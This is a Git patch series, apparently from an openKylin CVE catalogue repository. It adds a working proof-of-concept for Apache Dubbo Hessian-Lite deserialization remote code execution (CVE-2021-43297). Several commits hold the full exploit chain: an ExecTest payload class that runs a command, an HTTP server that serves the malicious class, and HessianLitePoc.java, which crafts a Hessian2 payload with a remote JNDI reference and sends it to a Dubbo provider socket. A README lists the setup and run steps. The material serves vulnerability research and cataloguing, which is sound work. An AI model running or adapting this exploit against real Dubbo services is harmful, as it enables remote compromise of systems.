From 504586fa8515419b80045ccb0236fb53d4334797 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 04:49:53 +0000 Subject: [PATCH 01/20] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20apache-Dubbo?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Dubbo/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Dubbo/.keep diff --git a/cve/apache-Dubbo/.keep b/cve/apache-Dubbo/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 770064a2b91b8213f6f8f57bd5c9cbfd0da03021 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 04:50:11 +0000 Subject: [PATCH 02/20] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Dubbo/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Dubbo/2021/.keep diff --git a/cve/apache-Dubbo/2021/.keep b/cve/apache-Dubbo/2021/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From b197374b85d6be55d46a2fa242c16ce7838b841e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 04:53:21 +0000 Subject: [PATCH 03/20] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Dubbo/2021/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Dubbo/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Dubbo/2021/.keep diff --git a/cve/apache-Dubbo/2021/.keep b/cve/apache-Dubbo/2021/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 2afcbab14d5b4ae8cfad7e4fd96bd8606a4013cd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 04:58:54 +0000 Subject: [PATCH 04/20] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202021?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Dubbo/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Dubbo/2021/.keep diff --git a/cve/apache-Dubbo/2021/.keep b/cve/apache-Dubbo/2021/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 210097b3530b4a3fe57cbbe84b1bdb881092ae3d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:00:37 +0000 Subject: [PATCH 05/20] add cve/apache-Dubbo/2021/README.md. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 凉月 --- cve/apache-Dubbo/2021/README.md | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100644 cve/apache-Dubbo/2021/README.md diff --git a/cve/apache-Dubbo/2021/README.md b/cve/apache-Dubbo/2021/README.md new file mode 100644 index 00000000..f5be07b7 --- /dev/null +++ b/cve/apache-Dubbo/2021/README.md @@ -0,0 +1,9 @@ +Apache Dubbo Hessian2异常处理时的反序列化(CVE-2021-43297) + + 将两个项目分别导入两个idea + + 先运行org.apache.dubbo.samples.basic.BasicProvider#main启动服务端 + + 再运行org.apache.dubbo.samples.basic.BasicConsumer#main启动客户攻击端 + +https://paper.seebug.org/1814/ \ No newline at end of file -- Gitee From 9f6bbc65b0f941650b050be1092a2d8e98362643 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:04:05 +0000 Subject: [PATCH 06/20] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Dubbo/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Dubbo/yaml/.keep diff --git a/cve/apache-Dubbo/yaml/.keep b/cve/apache-Dubbo/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 61803d1b6fe1db209e134f0d41c6182d4b755344 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:07:03 +0000 Subject: [PATCH 07/20] add CVE-2021-43297.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 凉月 --- cve/apache-Dubbo/yaml/CVE-2021-43297.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 cve/apache-Dubbo/yaml/CVE-2021-43297.yaml diff --git a/cve/apache-Dubbo/yaml/CVE-2021-43297.yaml b/cve/apache-Dubbo/yaml/CVE-2021-43297.yaml new file mode 100644 index 00000000..84eb42aa --- /dev/null +++ b/cve/apache-Dubbo/yaml/CVE-2021-43297.yaml @@ -0,0 +1,20 @@ +id: CVE-2021-43297 +source: https://github.com/longofo/Apache-Dubbo-Hessian2-CVE-2021-43297 +info: + name: Dubbo是一个高性能优秀的服务框架。 + severity: high + description: | + Dubbo是一个高性能优秀的服务框架。CVE-2021-43297中,在Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发远程代码执行。 + scope-of-influence: + Dubbo Hessian-Lite ≤ 3.2.11 + reference: + - https://help.aliyun.com/document_detail/390193.html + - https://lists.apache.org/thread/1mszxrvp90y01xob56yp002939c7hlww + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2021-43297 + cwe-id: CWE-502 + cnvd-id: None + kve-id: None + tags: cve2021, 数据泄漏 \ No newline at end of file -- Gitee From 41934437783230c4399d25e92c985955f4d35a3d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:07:17 +0000 Subject: [PATCH 08/20] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Dubbo/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Dubbo/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Dubbo/.keep diff --git a/cve/apache-Dubbo/.keep b/cve/apache-Dubbo/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From de0f66986c34adda865b105412d34872dde10a2e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:07:25 +0000 Subject: [PATCH 09/20] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Dubbo/2021/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Dubbo/2021/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Dubbo/2021/.keep diff --git a/cve/apache-Dubbo/2021/.keep b/cve/apache-Dubbo/2021/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 07e513257607fe5f7e9aa7fae83489f35f74963d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:07:36 +0000 Subject: [PATCH 10/20] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Dubbo/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Dubbo/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Dubbo/yaml/.keep diff --git a/cve/apache-Dubbo/yaml/.keep b/cve/apache-Dubbo/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 44623aeadb840f80ad2d549e75494cd9aa096c69 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:09:29 +0000 Subject: [PATCH 11/20] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 凉月 --- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index d83e8b4f..bebdec93 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -8,6 +8,8 @@ cve: - CVE-2022-24112 apache-CouchDB: - CVE-2022-24706 + apache-Dubbo: + - CVE-2021-43297 apache-log4j: - CVE-2021-44228 apache-solr: -- Gitee From 5778a035de4e2dde6764fc7ca6180703a65084f9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:12:30 +0000 Subject: [PATCH 12/20] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-43297?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Dubbo/2021/CVE-2021-43297/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache-Dubbo/2021/CVE-2021-43297/.keep diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/.keep b/cve/apache-Dubbo/2021/CVE-2021-43297/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 05126cc34e55484191d96c6ccf0c5cdc17d15541 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:13:24 +0000 Subject: [PATCH 13/20] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Dubbo/2021/README.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Dubbo/2021/README.md | 9 --------- 1 file changed, 9 deletions(-) delete mode 100644 cve/apache-Dubbo/2021/README.md diff --git a/cve/apache-Dubbo/2021/README.md b/cve/apache-Dubbo/2021/README.md deleted file mode 100644 index f5be07b7..00000000 --- a/cve/apache-Dubbo/2021/README.md +++ /dev/null @@ -1,9 +0,0 @@ -Apache Dubbo Hessian2异常处理时的反序列化(CVE-2021-43297) - - 将两个项目分别导入两个idea - - 先运行org.apache.dubbo.samples.basic.BasicProvider#main启动服务端 - - 再运行org.apache.dubbo.samples.basic.BasicConsumer#main启动客户攻击端 - -https://paper.seebug.org/1814/ \ No newline at end of file -- Gitee From 83d4cf84407d3042843f8106a5e664411fd4b4c9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:14:54 +0000 Subject: [PATCH 14/20] add CVE-2021-43297-POC MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 凉月 --- cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java b/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java new file mode 100644 index 00000000..9651b3ac --- /dev/null +++ b/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java @@ -0,0 +1,7 @@ +import java.io.IOException; +public class ExecTest { + public ExecTest() throws IOException { + new java.io.IOException().printStackTrace(); + java.lang.Runtime.getRuntime().exec("calc"); + } +} -- Gitee From a5503810180ef0075dbccab64198c18305afebdd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:15:59 +0000 Subject: [PATCH 15/20] add cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 凉月 --- .../2021/CVE-2021-43297/HTTPServer.java | 107 ++++++++++++++++++ 1 file changed, 107 insertions(+) create mode 100644 cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java b/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java new file mode 100644 index 00000000..167cbaef --- /dev/null +++ b/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java @@ -0,0 +1,107 @@ +import com.google.common.io.Files; +import com.sun.net.httpserver.Headers; +import com.sun.net.httpserver.HttpExchange; +import com.sun.net.httpserver.HttpHandler; +import com.sun.net.httpserver.HttpServer; +import com.sun.net.httpserver.spi.HttpServerProvider; +import java.io.BufferedReader; +import java.io.File; +import java.io.IOException; +import java.io.InputStreamReader; +import java.io.OutputStream; +import java.net.InetSocketAddress; +import java.util.Iterator; +import java.util.List; +import java.util.Set; +import org.apache.commons.lang3.StringUtils; + +/** + * 解析http协议,输出http请求体 + * + * @author xuanyh + */ +public class HTTPServer { + + public static String filePath; + public static int PORT = 8080; + public static String contentType; + + public static void main(String[] args) throws IOException { + run(args); + } + + public static void run(String[] args) { + int port = PORT; + String context = "/"; + String clazz = "Calc.class"; + if (args != null && args.length > 0) { + port = Integer.parseInt(args[0]); + context = args[1]; + clazz = args[2]; + } + HttpServerProvider provider = HttpServerProvider.provider(); + HttpServer httpserver = null; + try { + httpserver = provider.createHttpServer(new InetSocketAddress(port), 100); + } catch (IOException e) { + e.printStackTrace(); + } + //监听端口8080, + + httpserver.createContext(context, new RestGetHandler(clazz)); + httpserver.setExecutor(null); + httpserver.start(); + System.out.println("server started"); + } + + static class RestGetHandler implements HttpHandler { + + private String clazz; + + public RestGetHandler(String clazz) { + this.clazz = clazz; + } + + @Override + public void handle(HttpExchange he) throws IOException { + String requestMethod = he.getRequestMethod(); + System.out.println(requestMethod + " " + he.getRequestURI().getPath() + ( + StringUtils.isEmpty(he.getRequestURI().getRawQuery()) ? "" + : "?" + he.getRequestURI().getRawQuery()) + " " + he.getProtocol()); + if (requestMethod.equalsIgnoreCase("GET")) { + Headers responseHeaders = he.getResponseHeaders(); + responseHeaders.set("Content-Type", contentType == null ? "application/json" : contentType); + + he.sendResponseHeaders(200, 0); + // parse request + OutputStream responseBody = he.getResponseBody(); + Headers requestHeaders = he.getRequestHeaders(); + Set keySet = requestHeaders.keySet(); + Iterator iter = keySet.iterator(); + + while (iter.hasNext()) { + String key = iter.next(); + List values = requestHeaders.get(key); + String s = key + ": " + values.toString(); + System.out.println(s); + } + System.out.println(); + BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(he.getRequestBody())); + StringBuilder stringBuilder = new StringBuilder(); + String line; + for (;(line = bufferedReader.readLine()) != null;) { + stringBuilder.append(line); + } + System.out.println(stringBuilder.toString()); + +// byte[] bytes = Files.toByteArray(new File(filePath == null ? HTTPServer.class.getClassLoader().getResource(clazz).getPath() : filePath)); + + byte[] bytes = Files.toByteArray(new File("D:\\工具\\java\\fastjson反序列化\\jndi利用\\ExecTest.class")); + System.out.println(new String(bytes, 0, bytes.length)); + // send response + responseBody.write(bytes); + responseBody.close(); + } + } + } +} \ No newline at end of file -- Gitee From 5c3447b7829c387597b0b46653ca68ea5379467b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:16:51 +0000 Subject: [PATCH 16/20] add cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 凉月 --- .../2021/CVE-2021-43297/HessianLitePoc.java | 133 ++++++++++++++++++ 1 file changed, 133 insertions(+) create mode 100644 cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java b/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java new file mode 100644 index 00000000..04f8ed45 --- /dev/null +++ b/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java @@ -0,0 +1,133 @@ +package com.bitterz.dubbo; + +import com.alibaba.com.caucho.hessian.io.Hessian2Output; +import org.apache.dubbo.common.io.Bytes; +import org.apache.xbean.naming.context.ContextUtil; +import org.apache.xbean.naming.context.WritableContext; +import sun.reflect.ReflectionFactory; + +import javax.naming.Context; +import javax.naming.Reference; +import java.io.ByteArrayOutputStream; +import java.io.OutputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationTargetException; +import java.net.Socket; +import java.util.HashSet; +import java.util.Random; +public class HessianLitePoc { + + public static void main(String[] args) throws Exception { + + Context ctx = Reflections.createWithoutConstructor(WritableContext.class); + Reference ref = new Reference("ExecTest", "ExecTest","http://127.0.0.1:8080/"); + ContextUtil.ReadOnlyBinding binding = new ContextUtil.ReadOnlyBinding("foo", ref, ctx); + +// Field fullName = binding.getClass().getSuperclass().getSuperclass().getDeclaredField("fullName"); +// fullName.setAccessible(true); + Reflections.setFieldValue(binding, "fullName", "<<<<<"); +// fullName.set(binding, "<<<<<"); // 方便定位属性值的 + + + + byte [] heder2 = new byte[]{-38, -69, -30, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 1}; + //############################################################################################ + // 写入binding + ByteArrayOutputStream binding2bytes = new ByteArrayOutputStream(); + Hessian2Output outBinding = new Hessian2Output(binding2bytes); + outBinding.writeObject(binding); + outBinding.flushBuffer(); + //############################################################################################ + // binding序列化后的byte数组 + byte[] bindingBytes = binding2bytes.toByteArray(); + + // header. + byte[] header = new byte[16]; + // set magic number. + Bytes.short2bytes((short) 0xdabb, header); + // set request and serialization flag. + header[2] = (byte) ((byte) 0x80 | 0x20 | 2); + // set request id. + Bytes.long2bytes(new Random().nextInt(100000000), header, 4); + // 在header中记录 序列化对象 的长度,因为最后一个F被覆盖了,所以要-1 + Bytes.int2bytes(bindingBytes.length*2-1, header, 12); + + // 收集header+binding + ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); + byteArrayOutputStream.write(header); + byteArrayOutputStream.write(bindingBytes); + byte[] bytes = byteArrayOutputStream.toByteArray(); + + //############################################################################################ + // 组装payload = header+binding+binding + byte[] payload = new byte[bytes.length + bindingBytes.length -1]; + for (int i = 0; i < bytes.length; i++) { + payload[i] = bytes[i]; + } + + for (int i = 0; i < bindingBytes.length; i++) { + payload[i + bytes.length-1] = bindingBytes[i]; + } + //############################################################################################ + + // 修改flag的值 + payload[2] = 0x02; + + // 输出字节流的十六进制 + for (int i = 0; i < payload.length; i++) { + System.out.print(String.format("%02X", payload[i]) + " "); + if ((i + 1) % 8 == 0) + System.out.print(" "); + if ((i + 1) % 16 == 0 ) + System.out.println(); + } + System.out.println(); + // 输出byte数组转String + System.out.println(new String(payload,0,payload.length)); +// System.exit(1); + //todo 此处填写被攻击的dubbo服务提供者地址和端口 + Socket socket = new Socket("127.0.0.1", 20880); + OutputStream outputStream = socket.getOutputStream(); + outputStream.write(payload); + outputStream.flush(); + outputStream.close(); + System.out.println("\nsend!!"); + } + + + public static class Reflections{ + public static void setFieldValue(Object obj, String fieldName, Object fieldValue) throws Exception{ + Field field=null; + Class cl = obj.getClass(); + while (cl != Object.class){ + try{ + field = cl.getDeclaredField(fieldName); + if(field!=null){ + break;} + } + catch (Exception e){ + cl = cl.getSuperclass(); + } + } + if (field==null){ + System.out.println(obj.getClass().getName()); + System.out.println(fieldName); + } + field.setAccessible(true); + field.set(obj,fieldValue); + } + + public static T createWithoutConstructor(Class classToInstantiate) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]); + } + + public static T createWithConstructor(Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); + objCons.setAccessible(true); + Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); + sc.setAccessible(true); + return (T) sc.newInstance(consArgs); + } + } +} \ No newline at end of file -- Gitee From 1993cf8699eb23f9e9ca95d895051b6dfe8e51e3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:17:25 +0000 Subject: [PATCH 17/20] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Dubbo/2021/CVE-2021-43297/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Dubbo/2021/CVE-2021-43297/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Dubbo/2021/CVE-2021-43297/.keep diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/.keep b/cve/apache-Dubbo/2021/CVE-2021-43297/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 27dd155c34842fe986b6e99e546c673d08e1db32 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:19:03 +0000 Subject: [PATCH 18/20] add cve/apache-Dubbo/2021/CVE-2021-43297/README.md. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 凉月 --- .../2021/CVE-2021-43297/README.md | 167 ++++++++++++++++++ 1 file changed, 167 insertions(+) create mode 100644 cve/apache-Dubbo/2021/CVE-2021-43297/README.md diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/README.md b/cve/apache-Dubbo/2021/CVE-2021-43297/README.md new file mode 100644 index 00000000..adc6afef --- /dev/null +++ b/cve/apache-Dubbo/2021/CVE-2021-43297/README.md @@ -0,0 +1,167 @@ +漏洞描述 + +Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。 +Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发RCE攻击。 +环境安装和Poc运行 + + 首先下载zookeeper + +wget http://archive.apache.org/dist/zookeeper/zookeeper-3.3.3/zookeeper-3.3.3.tar.gz +tar zxvf zookeeper-3.3.3.tar.gz +cd zookeeper-3.3.3 +cp conf/zoo_sample.cfg conf/zoo.cfg + + 配置 + +vim conf/zoo.cfg +# The number of milliseconds of each tick +tickTime=2000 +# The number of ticks that the initial +# synchronization phase can take +initLimit=10 +# The number of ticks that can pass between +# sending a request and getting an acknowledgement +syncLimit=5 +# the directory where the snapshot is stored. +dataDir=/绝对路径/zookeeper-3.3.3/data +# the port at which the clients will connect +clientPort=2181 + + 修改绝对路径,在data目录下放置一个myid文件 + +mkdir data +touch data/myid + + 启动zookeeper + +cd /private/var/tmp/zookeeper-3.3.3/bin +./zkServer.sh start + + 安装dubbo-samples-api + +git clone https://github.com/apache/dubbo-samples.git +cd dubbo-samples/dubbo-samples-api + + 修改dubbo-samples/dubbo-samples-api/pom.xml + + + + 4.0.0 + + org.example + dubbomytest + pom + 1.0-SNAPSHOT + + + + org.apache.maven.plugins + maven-compiler-plugin + + 8 + 8 + + + + + + + + 1.8 + 1.8 + 2.7.6 + 4.12 + 0.30.0 + 1.2.0 + 3.7.0 + 2.21.0 + ${project.artifactId}:${dubbo.version} + openjdk:8 + 20880 + 2181 + org.apache.dubbo.samples.provider.Application + + + + + org.apache.dubbo + dubbo + 2.7.3 + + + org.apache.dubbo + dubbo-common + 2.7.3 + + + + org.apache.dubbo + dubbo-dependencies-zookeeper + 2.7.3 + pom + + + org.apache.xbean + xbean-naming + 4.15 + + + junit + junit + ${junit.version} + test + + + + + + + xbean包 + +provider端和本地都需要安装,依赖如下 + + + org.apache.xbean + xbean-naming + 4.15 + + + 编译启动 + +IDEA中添加dubbo-samples-api,注意修改zookeeper和dubbo的端口,另外在Application.java中修改代码: + +service.setRegistry(new RegistryConfig("zookeeper://" + zookeeperHost + ":" + zookeeperPort+"/?timeout=250000")); + +防止高版本dubbo连接zookeeper过慢而连接失败 + +在idea里面启动dubbo-samples-api中的Application.java + +启动后输出dubbo service started即表示dubbo已启动 + + 运行poc 本地添加依赖: + + + org.apache.dubbo + dubbo-common + 2.7.3 + + + org.apache.dubbo + dubbo + 2.7.3 + + + org.apache.dubbo + dubbo-dependencies-zookeeper + 2.7.3 + pom + + + com.caucho + hessian + 4.0.51 + + +编译ExecTest.java,随后在HttpServer.java中修改ExecTest.class的路径,然后执行HttpServer.main方法,最后执行HessianLitePoc.main方法 \ No newline at end of file -- Gitee From 9247e4cc28ac47d446ea613ceee2bdd7464833d7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 05:20:02 +0000 Subject: [PATCH 19/20] update cve/apache-Dubbo/2021/CVE-2021-43297/README.md. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 凉月 --- .../2021/CVE-2021-43297/README.md | 164 +----------------- 1 file changed, 1 insertion(+), 163 deletions(-) diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/README.md b/cve/apache-Dubbo/2021/CVE-2021-43297/README.md index adc6afef..b47312f3 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-43297/README.md +++ b/cve/apache-Dubbo/2021/CVE-2021-43297/README.md @@ -1,167 +1,5 @@ 漏洞描述 Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。 -Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发RCE攻击。 -环境安装和Poc运行 - - 首先下载zookeeper - -wget http://archive.apache.org/dist/zookeeper/zookeeper-3.3.3/zookeeper-3.3.3.tar.gz -tar zxvf zookeeper-3.3.3.tar.gz -cd zookeeper-3.3.3 -cp conf/zoo_sample.cfg conf/zoo.cfg - - 配置 - -vim conf/zoo.cfg -# The number of milliseconds of each tick -tickTime=2000 -# The number of ticks that the initial -# synchronization phase can take -initLimit=10 -# The number of ticks that can pass between -# sending a request and getting an acknowledgement -syncLimit=5 -# the directory where the snapshot is stored. -dataDir=/绝对路径/zookeeper-3.3.3/data -# the port at which the clients will connect -clientPort=2181 - - 修改绝对路径,在data目录下放置一个myid文件 - -mkdir data -touch data/myid - - 启动zookeeper - -cd /private/var/tmp/zookeeper-3.3.3/bin -./zkServer.sh start - - 安装dubbo-samples-api - -git clone https://github.com/apache/dubbo-samples.git -cd dubbo-samples/dubbo-samples-api - - 修改dubbo-samples/dubbo-samples-api/pom.xml - - - - 4.0.0 - - org.example - dubbomytest - pom - 1.0-SNAPSHOT - - - - org.apache.maven.plugins - maven-compiler-plugin - - 8 - 8 - - - - - - - - 1.8 - 1.8 - 2.7.6 - 4.12 - 0.30.0 - 1.2.0 - 3.7.0 - 2.21.0 - ${project.artifactId}:${dubbo.version} - openjdk:8 - 20880 - 2181 - org.apache.dubbo.samples.provider.Application - - - - - org.apache.dubbo - dubbo - 2.7.3 - - - org.apache.dubbo - dubbo-common - 2.7.3 - - - - org.apache.dubbo - dubbo-dependencies-zookeeper - 2.7.3 - pom - - - org.apache.xbean - xbean-naming - 4.15 - - - junit - junit - ${junit.version} - test - - - - - - - xbean包 - -provider端和本地都需要安装,依赖如下 - - - org.apache.xbean - xbean-naming - 4.15 - - - 编译启动 - -IDEA中添加dubbo-samples-api,注意修改zookeeper和dubbo的端口,另外在Application.java中修改代码: - -service.setRegistry(new RegistryConfig("zookeeper://" + zookeeperHost + ":" + zookeeperPort+"/?timeout=250000")); - -防止高版本dubbo连接zookeeper过慢而连接失败 - -在idea里面启动dubbo-samples-api中的Application.java - -启动后输出dubbo service started即表示dubbo已启动 - - 运行poc 本地添加依赖: - - - org.apache.dubbo - dubbo-common - 2.7.3 - - - org.apache.dubbo - dubbo - 2.7.3 - - - org.apache.dubbo - dubbo-dependencies-zookeeper - 2.7.3 - pom - - - com.caucho - hessian - 4.0.51 - - +Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发RCE攻击 编译ExecTest.java,随后在HttpServer.java中修改ExecTest.class的路径,然后执行HttpServer.main方法,最后执行HessianLitePoc.main方法 \ No newline at end of file -- Gitee From 240c4146b1efdaa4c1c59d2fefbc2e20ec145057 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=87=89=E6=9C=88?= Date: Thu, 16 Mar 2023 07:24:47 +0000 Subject: [PATCH 20/20] update cve/apache-Dubbo/yaml/CVE-2021-43297.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 凉月 --- cve/apache-Dubbo/yaml/CVE-2021-43297.yaml | 6 +++--- 